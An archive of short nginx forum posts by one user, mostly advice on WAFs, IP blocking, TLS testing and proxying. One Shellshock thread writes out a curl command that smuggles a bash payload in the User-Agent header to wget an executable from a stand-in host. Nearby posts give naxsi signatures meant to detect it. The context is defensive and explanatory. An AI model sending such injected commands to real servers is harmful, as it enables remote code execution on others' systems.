Re: WordPress pingback mitigation

2017-05-21 Thread mex
zero.bs/naxis-rules-manual.html regards, mex Posted at Nginx Forum: https://forum.nginx.org/read.php?2,274339,274358#msg-274358 ___ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginx

Re: Websocket security

2017-04-06 Thread mex
/anti-dos-websockets-best-practices/ - https://gist.github.com/subudeepak/9897212 - https://kaazing.com/2012/02/28/html5-websocket-security-is-strong/ regards, mex Posted at Nginx Forum: https://forum.nginx.org/read.php?2,273438,273440#msg-273440

Re: Naxsi Nginx High performance WAF

2017-01-06 Thread mex
grey rules means they are deactivated i'm gonna write a blog on how we use spike + doxi-rules in our setup, but it will take some time. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,271695,271844#msg-271844

Re: Naxsi Nginx High performance WAF

2016-12-24 Thread mex
Hi c0nw0nk, mex here, initial creator of http://spike.nginx-goodies.com/rules/ and maintainer of Doxi-Rules https://bitbucket.org/lazy_dogtown/doxi-rules/overview (this is where the rules live we create with spike :) the doxi-rules in its current state are inspired by emerging threats rules, and

Re: Blocking tens of thousands of IP's

2016-11-14 Thread mex
How do you transfer metrics from nginx to your pfsense? mayak Wrote: --- > We are blocking 2.2 million addresses, however, we do it at the > firewall/router (pfsense pfBlocker). > > Ultra fast. > > HTH > > Mayak > > ___

Re: RE: Blocking tens of thousands of IP's

2016-11-04 Thread mex
, mex Cox, Eric S Wrote: --- > Currently we track all access logs realtime via an in house built log > aggregation solution. Various algorithms are setup to detect said IPS > whether it be by hit rate, country, known types of attacks e

Re: Blocking tens of thousands of IP's

2016-11-04 Thread mex
e up with ipset add / del which is fast as hell and has a built-in TTL if you have a huge and dynamic set of ips to be blocked this is the way you should go cheers, mex Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270680,270757#msg-270757

Re: Global denial for certain IPs or agents?

2016-05-10 Thread mex
Hi Alex, you can do it that way or use something like this inside your server {} block: allow IP1; allow IP2; allow IP3; deny all; http://nginx.org/en/docs/http/ngx_http_access_module.html#allow Posted at Nginx Forum: https://forum.nginx.org/read.php?2,266738,266750#m

Re: Global denial for certain IPs or agents?

2016-05-10 Thread mex
Hi Alex this might be an inspiration for your task: https://www.howtoforge.com/nginx-how-to-block-visitors-by-country-with-the-geoip-module-debian-ubuntu cheers, mex Posted at Nginx Forum: https://forum.nginx.org/read.php?2,266738,266739#msg-266739

Re: Question about reverse proxies and WAFs

2016-04-25 Thread mex
for a nice and simple*) but yet powerful WAF-solution for nginx you might want to try naxsi https://github.com/nbs-system/naxsi *) simple in terms of: easy to setup, easy to maintain, easy to adjust cheers, mex Posted at Nginx Forum: https://forum.nginx.org/read.php?2,266350,266356#msg

Re: 502 Bad Gateway errors from Nginx when trying to access Tomcat

2016-04-21 Thread mex
hould trust this. for debugging, try curl -v http://JIRA_IP:JIRA_PORT/ from the server nginx runs on, to see if you have access to the resource you configured in proxy_pass cheers, mex Posted at Nginx Forum: https://forum.nginx.org/read.php?2,266336,2

how to forward basic-auth from upstream

2016-03-10 Thread mex
asic realm="$host"'; more_set_input_headers 'Authorization: $http_authorization'; ... } cheers, mex Posted at Nginx Forum: https://forum.nginx.org/read.php?2,265220,265220#msg-265220

Re: using nginx to mitigate the latest joomla-vuln - discussion

2015-12-16 Thread mex
" 1; default 0; } ... server { ... if ($blocked_ua) { return 403; } ... } ... } cheers, mex p.s. repost, because of forum-snafu Posted at Nginx Forum: https://forum.nginx.org/read.php?2,263478,263483#msg-263483 _

Re: nginx ignoring config file when started via systemd

2015-12-07 Thread mex
hi daniel, how did you install nginx, manually (self-compiled) or through your distro's repo? can you provide the nginx -V - output? usually /etc/nginx/nginx.conf is the default-config, if not given; nginx -V will tell what defaults are used in your config. cheers, mex Posted at

Re: Set up Proxy Server

2015-09-18 Thread mex
differences reverse vs forward-proxy read http://stackoverflow.com/questions/224664/difference-between-proxy-server-and-reverse-proxy-server cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,261649,261650#msg-261650

logging access in stream module

2015-09-03 Thread mex
hi, is there a way to log access (ip, date, size of payload) within the stream-module? i found error - log configurable for the stream only so far. cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,261411,261411#msg-261411

Re: Configure core Python scripts into Nginx

2015-08-06 Thread mex
if you ask for something like mod_cgi from the apache-world, there is nothing like this; the following article might help to define requirements and find a solution: > https://www.digitalocean.com/community/tutorials/a-comparison-of-web-servers-for-python-based-web-applications Nitin Solanki W

Re: Configure core Python scripts into Nginx

2015-08-06 Thread mex
ay > gunicorn (+nginx for static content, caching, ssl-offload and waf-features) is what we use here too on a couple of installations; it's rock solid and easy to use. cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260791

Re: TCP-Loadbalancer and allow/deny

2015-06-15 Thread mex
thank you very much, looks promising! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259613,259617#msg-259617

TCP-Loadbalancer and allow/deny

2015-06-14 Thread mex
://nginx.org/en/docs/http/ngx_http_access_module.html#allow atm we use a packetfilter, but having this feature in nginx - stream {} would be a great addition. thanx in advance, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259613,259613#msg-259613

Re: Nginx LibreSSL and BoringSSL alternative to OpenSSL ?

2015-06-04 Thread mex
thank you for your comment; i'll re-test with 1.8 and adjust the document accordingly. i think the config-workaround is obsolete too. cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259325,259372#msg-259372

Re: Nginx LibreSSL and BoringSSL alternative to OpenSSL ?

2015-06-01 Thread mex
Hi, nginx + libressl works without any issues; we have it running since last summer and have seen no problems so far, but did not test it with 1.8.x though the following explains how to do it: https://8ack.de/guides/nginx-libressl-first-test cheers, mex Posted at Nginx Forum: http

Re: shellshock probing

2015-04-01 Thread mex
if you have questions on naxsi, feel free to join the naxsi-discuss - ml https://groups.google.com/forum/#!forum/naxsi-discuss cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,257792,257801#msg-257801

Re: shellshock probing

2015-04-01 Thread mex
" "s:$ATTACK:8" id:42000393 ; see -> http://spike.nginx-goodies.com/rules/view/42000393 there is also an extended ruleset available -> https://bitbucket.org/lazy_dogtown/doxi-rules cheers, mex Posted at Nginx Forum: http://forum

Re: Using naxsi as a "circuit breaker"

2015-03-27 Thread mex
Hello, what does naxsi have to do with it? you probably wanted to talk about nginx, naxsi is a 3rd-party-module, extending nginx on WAF-features for your problem you might want to check http://nginx.org/en/docs/http/ngx_http_limit_req_module.html cheers, mex Posted at Nginx Forum

Re: Request for thoughts / feedback: Guide on Nginx Monitoring

2015-02-12 Thread mex
ad-> reading requests from clients writ-> reading request body, processes request, or writes response to a client wait-> keep-alive connections, actually it is ac - (read + writ) ct -> checktime (connection time) for this check cheers, mex Post

Google dumps SPDY in favour of HTTP/2, any plans for nginx?

2015-02-10 Thread mex
o say goodbye. We plan to remove support for SPDY in early 2016, and to also remove support for the TLS extension named NPN in favor of ALPN in Chrome at the same time. Server developers are strongly encouraged to move to HTTP/2 and ALPN." cheers, mex Posted at Nginx Forum: http://forum

Re: Nginx Supports SLES 11?

2015-01-29 Thread mex
you'll need a lot of packages from the SDK-DVDs. IIRC those are not available as online-repos, but situation might have changed. mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,256323,256325#msg-256325

Re: Modify request body before sending to upstream

2015-01-26 Thread mex
use this directive and other content handler directives in the same location. For example, this directive and the proxy_pass directive should not be used in the same location." what you can do is use the access_by_lua or rewrite_by_lua - directive cheers, mex Posted at Nginx Forum

Re: Modify request body before sending to upstream

2015-01-26 Thread mex
or rewrite-phase, make your processing and pass the result to your upstream-servers using proxy_pass and all the upstream {} - goodies cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,256226,256282#msg-256282

Re: nginx proxy_pass configuration to virtualhost

2014-12-21 Thread mex
is will work as expected, except you put in the ip. but then the apache on the other side should be configured with the ip in the virtualhost cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,255696,255704#msg-255704

Re: Exclude ip's from Nginx limit_req zone

2014-12-21 Thread mex
hi, does this link help? > http://gadelkareem.com/2012/03/25/limit-requests-per-ip-on-nginx-using-httplimitzonemodule-and-httplimitreqmodule-except-whitelist/ cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,255697,255703#msg-255

Re: NGINX using 100% of the server CPU when testing with Blitz.io

2014-11-26 Thread mex
hi, does your errorlog tell you something? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,255158,255162#msg-255162

Re: Rewrite with permanent and last

2014-11-20 Thread mex
nginx has a last flag too: http://nginx.org/en/docs/http/ngx_http_rewrite_module.html#rewrite Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254969,255005#msg-255005

Re: Slow Time to first byte

2014-11-19 Thread mex
so it looks more like a php/processing-problem, no? cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254876,254910#msg-254910

Re: problem with argument route in upstream

2014-11-19 Thread mex
Hi, you can use the nginx-sticky-module if you need sticky sessions https://bitbucket.org/nginx-goodies/nginx-sticky-module-ng it just has no way to extract the routing-info from tomcat-routes (yet, we're working on it) and comes with an own cookie, but is production-ready cheers,

Re: Slow Time to first byte

2014-11-18 Thread mex
Hi, do you see this problem when accessing static files as well as php-files rendered by php-fpm? did you make a perftest on /static/small.css /path/index.php? would be interesting to see if this is a php-based problem. cheers, mex Posted at Nginx Forum: http://forum.nginx.org

SSL Session Ticket Expiration

2014-11-18 Thread mex
2 hours to flush the ssl_session_cache? [1] - https://timtaubert.de/blog/2014/11/the-sad-state-of-server-side-tls-session-resumption-implementations/ cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254881,254881#msg-254881

Re: Disable keep_alive based on specific useragent

2014-11-18 Thread mex
nope, this seems to be a longer-known problem: http://forum.nginx.org/read.php?10,233386,template=head i (at least) did not get it working, either with "default 300;" or with set katimeout 300; Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254833,254879#msg-254879

Re: Disable keep_alive based on specific useragent

2014-11-16 Thread mex
ml#if http://nginx.org/en/docs/http/ngx_http_map_module.html cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254833,254835#msg-254835

Re: Configurations strangeness - mistake or bug?

2014-11-16 Thread mex
please delete your browser-history for every browser, restart your nginx and test again. cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254825,254827#msg-254827

Re: Load balancer question

2014-11-12 Thread mex
the logs on your appserver. cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254770,254781#msg-254781

Mozilla SSL Config Generator

2014-10-23 Thread mex
nice! http://mozilla.github.io/server-side-tls/ssl-config-generator/ did not test all profiles, but intermediates gives A+ on ssllabs, supports every browser except winxp/ie6 and has all the goodies enabled $ ./testssl.sh example.com #

Re: Delete or restart cookies - issue with chrome

2014-10-23 Thread mex
Hi Raul, > I don't know what cookie is, the site is http://urbania.pe > if you don't know the cookie-name you cannot reset them from nginx, but i see quite a few in my developer-tools. i'd suggest you create a location that matches this false redirect-location and reset the cookies from within th

Re: Delete or restart cookies - issue with chrome

2014-10-22 Thread mex
Hi Raúl, do you have the cookie-name or is it random? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254207,254208#msg-254208

Re: Nginx Security Hardening and Rules

2014-10-20 Thread mex
for scanners/indexes of public services you might search for "shodan" for the valid use of security through obscurity: "My thoughts on this are that obscuring information is helpful to security in many cases as it can force an attacker to generate more "noise" which can be detected. Where obsc

Re: Qualys (ssl labs) results question

2014-10-19 Thread mex
? i think you'd need to configure reverse-dns for your site's name to point to that server's ip, and you must use A-records, not CNAMES; if this sounds uncommon to you ask your hosting-provider, they should be able to answer your questions. cheers, mex Posted at Nginx Forum:

Re: SPDY errors in log

2014-10-19 Thread mex
hi tunist, if you want to test your server for CCS-vuln you might use https://www.ssllabs.com/ssltest/ or the testscript from https://testssl.sh/ when you prefer to test locally. > > though when i run openssl version, i see: OpenSSL 1.0.1e-fips 11 Feb > 2013 not sure why..!? distros backpor

Re: SPDY errors in log

2014-10-19 Thread mex
CCS-scan probably, see https://www.mare-system.de/guide-to-nginx-ssl-spdy-hsts/#ccs-early-changecipherspec-attack) what openssl-version do you use? cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254144,254146#msg-254146

Re: Nginx Security Hardening and Rules

2014-10-19 Thread mex
i think it's a nice idea and surely will participate with some stuff like security-headers (CSP/X-Frame-Options etc) single issues/questions might still be discussed on-list, and it should be no problem to post updates here from time to time. cheers, mex Posted at Nginx Forum:

Re: Nginx Security Hardening and Rules

2014-10-19 Thread mex
hi, i'd suggest you collect your snippets in the nginx-wiki http://wiki.nginx.org/ and link your collection back to http://wiki.nginx.org/Configuration thus it will be easier to maintain and extend. cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254125,25413

Re: issue with ssl_ciphers not being respected

2014-10-18 Thread mex
maybe related (maxim's answer) http://forum.nginx.org/read.php?2,254016,254050#msg-254050 Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254028,254123#msg-254123

Re: RoR app, “Failed to load resource: the server responded with a status of 404 (Not Found)”

2014-10-17 Thread mex
iirc you don't need a $1 behind alias like in rewrite-rules http://nginx.org/en/docs/http/ngx_http_core_module.html#alias the following should work location /wifi { alias /var/www/owums/public; # <-- be sure to point to 'public'! passenger_base_uri /wifi; passenger_app_root /var/www/

Re: TLS_FALLBACK_SCSV

2014-10-17 Thread mex
> Regarding POODLEbleed[1] issue, I've disable SSLv3 on `ssl_protocols` that's the most important part > directive. But, ssllabs.com says that : > > snip > Downgrade attack prevention No, TLS_FALLBACK_SCSV not supported (more > info[2]) TLS_FALLBACK_SCSV also prevents downgrades fro

Re: issue with ssl_ciphers not being respected

2014-10-16 Thread mex
what does cipherscan say? https://github.com/jvehent/cipherscan you can run that from the server nginx runs on Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254028,254082#msg-254082

Re: issue with ssl_ciphers not being respected

2014-10-16 Thread mex
hi, > > > > - make sure you are testing correct server. > > i'd suggest to configure an additional access/error-log in that server {} - block, to be 100% sure. regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,2

Re: ssl_protocols per server?

2014-10-16 Thread mex
the right server {} - config we can try to figure out what's happening. cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254016,254027#msg-254027

Re: Logging POST body

2014-10-15 Thread mex
hi, did you even try to google it? dork: "logging post body nginx" http://stackoverflow.com/questions/4939382/logging-post-data-from-request-body cheers, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,254007,254009#

Re: client_max_body_size increase

2014-10-14 Thread mex
it is more a performance- than a security-issue (diskspace, i/o, buffering) etc Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253959,253960#msg-253960

Re: cannot make catch all ssl server block work [corrected]

2014-10-13 Thread mex
did you try server_name _; already? did you chain the certs for a.com / c.com in the correct order? see http://nginx.org/en/docs/http/configuring_https_servers.html / An SSL certificate with several names Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253929,253946#msg-25394

Re: RE: Can I use ngix as a SSL encryption wrapper as Stunnel?

2014-10-13 Thread mex
i don't know of an out-of-the-box-solution, but this might point into the right direction: - https://github.com/yaoweibin/nginx_tcp_proxy_module - http://stackoverflow.com/questions/5337122/is-it-possible-to-forward-non-http-connecting-request-to-some-other-port-in-ngin cheers, mex Posted at

Re: nginx centos build only supports SSLv3 and ignores ssl_protocols

2014-10-01 Thread mex
btw, it seems impossible to have ... ssl_protocols TLSv1.2; ... and a testresult of SSLv2 NOT offered (ok) SSLv3 offered TLSv1 not offered TLSv1.1 not offered TLSv1.2 not offered are you sure you have tested the right machine? i'd suggest you run the testssl.sh - script against https://localho

Re: nginx centos build only supports SSLv3 and ignores ssl_protocols

2014-10-01 Thread mex
r-outdated-openssl-versions regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253665,253666#msg-253666

Re: Shellshock protection using nginx ?

2014-09-26 Thread mex
curl -k -H 'User-Agent: () { somedummytext; }; /usr/bin/wget -O /tmp/nastyexe http://myserver.com/nastyexe' https://target.com/cgi-bin/hi :D if, you should try to match for (regex-pattern) "\(\) {" #since this must be written like this; an additional space between "() {" would render the e

Re: Shellshock protection using nginx ?

2014-09-26 Thread mex
hi pekka, since the attack, esp. against CGI, is possible through (custom) headers/cookies etc you'd need some waf-functionalities (afaik) naxsi, an nginx-based waf, has a signature for this since wednesday MainRule "str:() {" "msg:Possible Remote code execution through Bash CVE-2014-6271" "mz

Re: CVE-2014-6271 : Remote code execution through bash

2014-09-25 Thread mex
foo ... http://www.openwall.com/lists/oss-security/2014/09/24/17 "Note that on Linux systems where /bin/sh is symlinked to /bin/bash, any popen() / system() calls from within languages such as PHP would be of concern due to the ability to control HTTP_* in the env. /mz" $ ls -la /bin/sh lrwxrwx

CVE-2014-6271 : Remote code execution through bash

2014-09-24 Thread mex
/09/ruleset-update-possible-remote-code.html regards & happy patching (and sorry for this slightly OT-post) mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253532,253532#msg-253532

Re: nginx subdomains ajp module

2014-07-24 Thread mex
can you post your config please? beside this, is there a reason you stick to AJP-connector? iirc this is not a default-module for nginx, and on my testing i found the HTTP-connector as fast as AJP, but working kind of smoother for tomcat-appservers regards, mex Posted at Nginx Forum: http

Re: Nginx + LibreSSL - a first test

2014-07-15 Thread mex
RSION_NUMBER 0x10002002L the openssl-binary compiles fine, but i cannot check with nginx-mainline right now, maybe later thanks for the patch! regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,251718,251793#msg-251793

Re: Nginx + LibreSSL - a first test (update)

2014-07-14 Thread mex
updated: static version and new perftests included https://www.mare-system.de/blog/page/1405201517/ regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,251718,251760#msg-251760

Re: Nginx + LibreSSL - a first test

2014-07-14 Thread mex
i wanted to test if it is possible. And it is. There > are no > > functional or performance-issues, as far as i can test, and building > nginx + > > libressl is easy, once you figured out how to do it. The advantages > of using > > LibreSSL in the long run, from my point of

Re: Is it possible to send html HEAD early (chunked)?

2014-07-14 Thread mex
> I think the cleanest solution would be if the backend could receive 1 > request and just split the content/response into chunks and send > what's > immediately available (html head + perhaps page header as well) as > first > chunk and send the rest afterwards. sounds tricky ... i must admit, i a

Re: Is it possible to send html HEAD early (chunked)?

2014-07-13 Thread mex
amic" part that must wait for the backend? > > Exactly. > > Cheers, > Martin > > > the only solution i could think of in such an asynchronous delivery > > is using nginx + lua, or maybe varnish (iirc you could mark parts of > a > > page cacheable, but do

Re: Is it possible to send html HEAD early (chunked)?

2014-07-13 Thread mex
us delivery is using nginx + lua, or maybe varnish (iirc you could mark parts of a page cacheable, but don't know if you can deliver asynchronously though) regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,251717,251719#msg-251719

Nginx + LibreSSL - a first test

2014-07-13 Thread mex
regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,251718,251718#msg-251718

nginx #1 on the Top 1000 - list (w3techs)

2014-04-30 Thread mex
unrelated, but i found the dancing-part amusing :D https://www.youtube.com/watch?v=7xO-yEaiFoQ regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,249761,249761#msg-249761

Re: High traffic on Nginx-Webservers !!

2014-04-22 Thread mex
PONG Posted at Nginx Forum: http://forum.nginx.org/read.php?2,249437,249450#msg-249450

Re: High traffic on Nginx-Webservers !!

2014-04-22 Thread mex
depending on your setup you might think about serving static content and videos directly from nginx: http://www.nginxtips.com/optimizing-nginx-for-video-sites/ anything served directly from nginx, not going to apache will boost your performance. > Mex, That's a high amount of redu

Re: High traffic on Nginx-Webservers !!

2014-04-22 Thread mex
the nginx-servers are still idling at around 0.2 we use nginx to cache static content as well as dynamic pages regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,249437,249445#msg-249445

Re: Commodo SSL

2014-04-17 Thread mex
if your site is silviosiefke.com, there is no tls-service available on port 443 can you please paste the output of nginx -t / nginx -V ? testssl.sh v2.0rc2 (https://testssl.sh) U

Re: 499 in a proxy environment and short execution php scripts

2014-04-17 Thread mex
maybe you should capture the traffic with wireshark to see which party sends what packet in which order. regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,249320,249365#msg-249365

Re: how to configure nginx with running apache ?

2014-04-17 Thread mex
> Hence I have to place nginx before apache without disturbing the > setup. > works seamlessly and speeds up your apache, when using proxy_cache, assuming your apache listens on 8080 server { listen 80; server_name myhost; location / { root /path/to/myapp/public; proxy_set_heade

Re: how to configure nginx with running apache ?

2014-04-17 Thread mex
> Can anyone tell my what the benefits are ( apart from .htaccess > support, > which I see all too often as a curse ) why anyone would do this in > preference to just using a pure nginx solution? > - out-of-the-box running stuff like mod_php / suphp - excessive use of rewrite-rules in .htaccess to

Re: how to configure nginx with running apache ?

2014-04-17 Thread mex
you should make your apache listen on 127.0.0.1:80 and nginx on your external IP:80 (443 if you need ssl) did you check the manuals in the wiki? http://wiki.nginx.org/Configuration -> proxying examples http://wiki.nginx.org/LikeApache -> all you need for a start after this you should check pr

Re: openssl 1.0.1 and tls1.1 and up

2014-04-15 Thread mex
hi, what is your os (name and version)? where do you have the ciphers from btw? i'd suggest you test the tls-version yourself with testssl.sh https://bitbucket.org/nginx-goodies/testssl.sh (note: you need a current openssl-version on the machine you test from) regards, mex Post

OT / Re: nginx segfaulting with mod_security

2014-04-14 Thread mex
the community is responsive and open for feature-requests or bugreports. regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,249248,249294#msg-249294

nginx + alternate ssl-libs

2014-04-14 Thread mex
i've seen the question below on nginx-dev from september last year, http://forum.nginx.org/read.php?29,243031,243031#msg-243031 I've seen some attempts to use polarssl one year ago and would like to restart development in that direction, so i'd like to re-issue this question from Aleksandar Lazi

Re: Case insensitive location

2014-04-11 Thread mex
else regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,249105,249226#msg-249226

Re: OpenSSL leaks server-Keys / The Heartbleed Bug

2014-04-09 Thread mex
> Also it's worth to look at the recent nginx blog post regarding > heartbleed: > > http://nginx.com/blog/nginx-and-the-heartbleed-vulnerability/ > thanx for the link maxim, has been incorporated regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php

Re: OpenSSL leaks server-Keys / The Heartbleed Bug

2014-04-08 Thread mex
Guide to Nginx + SSL + SPDY has been updated with some infos, links and tests regarding heartbleed https://www.mare-system.de/guide-to-nginx-ssl-spdy-hsts/#heartbleed regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,249102,249131#msg-249131

OpenSSL leaks server-Keys / The Heartbleed Bug

2014-04-08 Thread mex
/diagnosis_of_the_openssl_heartbleed_bug/ http://security.stackexchange.com/search?q=heartbleed regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,249102,249102#msg-249102

Re: testssl.sh - script to test your ssl-setup from cli

2014-04-04 Thread mex
thanx, nice tool! i integrated this into our ssl-guide https://www.mare-system.de/guide-to-nginx-ssl-spdy-hsts/#testing-ssl-setups Posted at Nginx Forum: http://forum.nginx.org/read.php?2,248997,249000#msg-249000

testssl.sh - script to test your ssl-setup from cli

2014-04-04 Thread mex
disclaimer: i'm not the creator of that script; i'm just maintaining the repo. owner & contact might be found on the webpage https://testssl.sh/ regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,248997,248997#msg-248997

[ANN] sticky-nginx-module forked and extended

2014-02-23 Thread mex
d test for compatibility with future-releases of nginx. feel free to contact me if you have requirements for that module, contact-data might be found in the readme. regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,247882,247882#

Re: cookie bomb - how to protect?

2014-01-19 Thread mex
hi coderman, increasing the header_size is not a solution, since i look for a generic solution to circumvent the outcome of those malicious request. a possible way to handle this is a lightweight WAF-solution, lua comes to my mind :) regards, mex p.s. we're working on a lighweigh

cookie bomb - how to protect?

2014-01-19 Thread mex
o Large my question: is there a generic way to check the size of such headers like cookies etc and to cut them off, or should we live with such malicious intent? regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,246597,246597#msg-246597

bad performance with static files + keepalive

2013-10-26 Thread mex
Hi List, i have a strange performance-issue on a server that serves static-files only (http + https), if files are bigger than 5k: - rps drops from 6500 rps (empty file) to 13 rps when requesting a file > 5k - perftest with location /perftest/ is at 8000 rps (https) / 15000 rps (http) - perftest

Re: Getting forward secrecy enabled

2013-10-10 Thread mex
hi darren, your ciphers look very good! i included your suggestion in my ssl-guide, looking forward to perftest those cipher_suites. regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,243341,243594#msg-243594

[DOC] OpenSSL Cookbook v1.1 released (by Ivan Rictic)

2013-10-08 Thread mex
ation. Download: https://www.feistyduck.com/books/openssl-cookbook/ regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,243541,243541#msg-243541

Re: Overhead when enabling debug?

2013-10-05 Thread mex
answer, i'll invest some time and check your toolchains, especially systemtap. is systemtap included in openresty? looks like the perfect tool to create some nagios-plugins upon. regards, mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,243201,243452#msg-2
